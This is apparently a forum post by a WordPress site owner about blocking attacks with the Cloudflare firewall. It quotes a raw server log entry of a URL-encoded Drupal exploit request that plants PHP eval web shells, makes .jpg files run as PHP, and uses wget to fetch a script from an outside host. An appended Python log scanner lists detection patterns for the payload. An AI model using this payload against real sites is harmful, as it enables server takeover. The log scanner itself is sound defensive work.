Thank you for the answers and ideas! I will try them!
I just discovered a few these ago how cool and customizable the Cloudflare firewall is. I had thousands of daily XMLRPC.php attacks; although I previously blocked access to it in .htaccess, I think it’s still better to block this directly in the Cloudflare Firewall.
I also have attacks in my server log like these:
"POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 200 24584 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
I don’t know if it’s a possible vulnerable method for any WordPress installations, but I also blocked access to any queries like that.
A big problem is that I can’t upgrade WordPress safely, because I have a highly customized theme and I also tweaked the files of the plugins, so I don’t wanna lose these modifications and I also don’t wanna risk a possible incompatibility with newer WordPress versions.
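An added example, not part of the original post: one way to scan an access log for requests shaped like the one quoted above, by percent-decoding the query string and flagging parameter names that carry a bracketed `#` key or values containing shell/PHP fragments. The function and pattern names are hypothetical, and the sample log lines are constructed (shortened to the same request shape, with documentation IP addresses).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# Parameter name with a bracketed key starting with '#', e.g. name[#post_render][]
HASH_KEY_RE = re.compile(r'\[#(?P<key>[A-Za-z_]+)\]')
# Fragments that appear in the decoded values of the logged request
SUSPICIOUS_VALUE_RE = re.compile(
    r'(<\?php|\beval\s*\(|\bwget\b|\bpassthru\b|AddType\s+application/x-httpd-php)',
    re.IGNORECASE,
)

def inspect_log_line(line):
    """Return a list of (kind, detail) findings; an empty list means nothing flagged."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    # parse_qsl percent-decodes names and values and turns '+' into a space
    for name, value in parse_qsl(query, keep_blank_values=True):
        for key in HASH_KEY_RE.findall(name):
            findings.append(("hash-key-param", "#" + key))
        hit = SUSPICIOUS_VALUE_RE.search(value)
        if hit:
            findings.append(("suspicious-value", hit.group(1).lower()))
    return findings

# Constructed sample lines: the first mirrors the parameter names in the post's log entry
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:00:00:00 +0000] "POST /?q=user%2Fpassword'
    '&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup'
    '&name%5B%23markup%5D=echo+test HTTP/1.1" 200 24584 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [01/Jan/2024:00:00:05 +0000] '
    '"GET /?s=cloudflare+firewall&page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def flagged_lines(lines):
    """Return (line_index, findings) for every line with at least one finding."""
    results = []
    for i, line in enumerate(lines):
        found = inspect_log_line(line)
        if found:
            results.append((i, found))
    return results

if __name__ == "__main__":
    for index, found in flagged_lines(SAMPLE_LOG):
        print(index, found)
```

The response code matters when reviewing hits: the entry in the post was answered with 200, so a flagged line with a 2xx status deserves a check of the web root for files the request tried to write.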